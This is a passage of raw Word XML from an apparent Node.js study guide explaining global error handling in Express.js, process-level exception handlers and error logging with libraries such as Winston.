        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Node.js is a centralized mechanism for catching and handling errors that occur throughout an application, especially those that are not handled by local error handlers. Implementing a global error handler helps improve the reliability and maintainability of an application by ensuring that all errors are captured and appropriately managed, instead of causing the application to crash or behave unexpectedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E062028"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Why Implement a Global Error Handler?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C8EC6" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Provides a uniform way to manage errors across the entire application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CE1F83" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Stability</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Prevents the application from crashing due to unhandled errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169BDFC6" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Logging and Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Allows centralized logging of errors for better debugging and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E47A14" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="583"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User Experience</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Enables graceful degradation by showing user-friendly error messages or responses instead of application crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C5895"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Implementing a Global Error Handler in Node.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F4E21" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>There are different approaches to implementing a global error handler in Node.js, depending on whether the application is a simple script, an Express.js application, or another type of Node.js application. Below are some common approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19752786"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1. Global Error Handling in Express.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A09DC" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Express.js is a popular web framework for Node.js that includes built-in support for error handling. You can define a global error-handling middleware to catch and handle errors occurring in any route or middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD91004"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Example of a Global Error Handler in Express.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4417D329"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express = require('express');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610CA1B0"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app = express();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA3B5F4"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F882363"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Sample route that throws an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C26D52"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app.get('/', (req, res, next) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E8D368"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next(new Error('Something went wrong!'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0316D9"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D90430C"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268F062"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Other routes or middleware...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAD550"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C36459D"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Global error-handling middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29197313"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50606DFA"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console.error(err.stack); // Log the error stack trace for debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E67F400"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res.status(500).json({ message: 'Internal Server Error' });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15087839"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0F8DC7B"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662F0FE1"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Start the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36812998"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app.listen(3000, () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14257F04"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console.log('Server is running on port 3000');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D868B46"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D99FFEE"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FC1EE9" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>The app.use((err, req, res, next) =&gt; {}) function is an error-handling middleware. It has four parameters, which is how Express.js distinguishes it from regular middleware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3A9520" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="584"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Errors passed to next() in any route or middleware will be caught by this global error handler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5877ED93"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2. Handling Uncaught Exceptions and Unhandled Rejections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE21179" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For errors that escape the normal flow of control, such as uncaught exceptions and unhandled promise rejections, Node.js provides global process-level error handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC5061A"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Handling Uncaught Exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0839A5"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process.on('uncaughtException', (err) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F987729"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console.error('Uncaught Exception:', err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5720426D"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA123F8"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Optionally exit the process (best practice is to restart the process)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEDA8CD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7193CC"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F3FABFC"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Handling Unhandled Promise Rejections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8608B9"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process.on('unhandledRejection', (reason, promise) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270987F0"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console.error('Unhandled Rejection:', reason);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B0B6DD"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Optionally log the reason and take other actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D640A5D"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1EE4F9A" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is generally recommended to restart the application after an uncaught exception because the state of the application may be compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E709B2A"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3. Global Error Handling in Other Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD7A64" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>For non-Express.js applications or custom applications, you can create a central error-handling function or module that other parts of your application call when errors occur. This function can log the errors, notify developers, and gracefully handle the error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274D29E4"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CD11A"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function globalErrorHandler(err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCEC049"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console.error('Global Error:', err.message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3BBAA"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console.error(err.stack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64332812"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Send email notifications, log to a remote service, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1995270A"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A075EB6"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7C928CF"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Example usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F6BFB"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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E73C5"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Application logic that might throw an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBC2282"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throw new Error('Unexpected error');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6584BC2D"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catch (err) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3033FA5E"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globalErrorHandler(err);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5518B0D4" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08"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F449633" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best Practices for Implementing Global Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7542EC8E" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Do Not Swallow Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Always log or notify the error rather than silently ignoring it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2379EF1C" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Graceful Shutdown</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: After handling a critical error, gracefully shut down the application if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D6D1D4" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Monitoring and Alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: Integrate your global error handler with a logging and monitoring service to receive real-time alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273C5E86" w14:textId="77777777" w:rsidR="004C5D08" w:rsidRPr="00DA2F32" w:rsidRDefault="004C5D08" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="585"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>User-Friendly Responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: For web applications, ensure that error messages sent to users do not expose sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2864F48F" w14:textId="77777777" w:rsidR="00EB2BF7" w:rsidRPr="00DA2F32" w:rsidRDefault="00EB2BF7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0C967D" w14:textId="2A1CE851" w:rsidR="00D246F0" w:rsidRPr="00DA2F32" w:rsidRDefault="009A2163" w:rsidP="009E0607">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc178383354"/>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>How do you manage error logging in a Node.js application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w14:paraId="72F5E4F4"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Error logging in a Node.js application is essential for tracking issues, debugging, and maintaining the overall health of the application. Proper error logging helps developers identify the root causes of problems, understand application behavior, and monitor performance. Here’s a guide on how to effectively manage error logging in a Node.js application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5D690A"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1. Use a Logging Library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40937CF9"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While console.log can be useful during development, it’s not sufficient for production environments. Using a dedicated logging library provides more control, flexibility, and features such as log levels, timestamps, and transport options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E3C36"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Popular Logging Libraries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8E911" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Winston:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A versatile and popular logging library with support for multiple transports (console, file, HTTP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA1F7FB" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Bunyan:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A fast JSON logging library with a focus on structured logging and log streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB34AFA" w14:textId="77777777" w:rsidR="007828CF" w:rsidRPr="00DA2F32" w:rsidRDefault="007828CF" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="586"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Pino:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A lightweight and fast logging library, ideal for high-performance applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5016C9"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example Using Winston:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE7536"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winston = require('winston');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA38857"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2B21E7D"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Configure winston logger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764873AE"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logger = winston.createLogger({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548AC4FC"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level: 'info', // Set log level (error, warn, info, verbose, debug, silly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB3CB3D"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format: winston.format.combine(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88DF3F"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winston.format.timestamp(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E91F92"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winston.format.json()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CF9E9"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 xml:space="preserve">  ),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBC1944"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transports: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77221353"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new winston.transports.Console(), // Log to the console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C5E3F"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new winston.transports.File({ filename: 'error.log', level: 'error' }), // Log errors to file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C883E9"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new winston.transports.File({ filename: 'combined.log' }) // Log all levels to file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C794036"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12A124CC"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4B0D5D08"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5AB6DB37"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Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3404A89E"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logger.info('This is an info message');</w:t>
      </w:r>
    </w:p>
